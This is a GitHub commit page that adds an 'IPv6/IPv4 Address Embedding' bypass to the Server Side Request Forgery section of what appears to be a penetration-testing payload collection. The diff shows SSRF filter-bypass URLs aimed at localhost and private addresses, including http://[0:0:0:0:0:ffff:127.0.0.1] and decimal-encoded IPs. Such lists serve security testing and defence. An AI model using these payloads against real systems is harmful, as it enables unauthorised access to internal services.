Skip to content

Commit

Permalink
Merge pull request #62 from PwnFunction/patch-1
Browse files Browse the repository at this point in the history
Bypass using IPv6/IPv4 Address Embedding
  • Loading branch information
swisskyrepo committed Apr 13, 2019
2 parents eb045a7 + 4c6f9e2 commit ee00dc1
Showing 1 changed file with 6 additions and 0 deletions.
6 changes: 6 additions & 0 deletions Server Side Request Forgery/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -123,6 +123,12 @@ http://3232235521/ = http://192.168.0.1
http://3232235777/ = http://192.168.1.1
```

Bypass using [IPv6/IPv4 Address Embedding](http://www.tcpipguide.com/free/t_IPv6IPv4AddressEmbedding.htm)

```powershell
http://[0:0:0:0:0:ffff:127.0.0.1]
```

Bypass using malformed urls

```powershell
Expand Down

0 comments on commit ee00dc1

Please sign in to comment.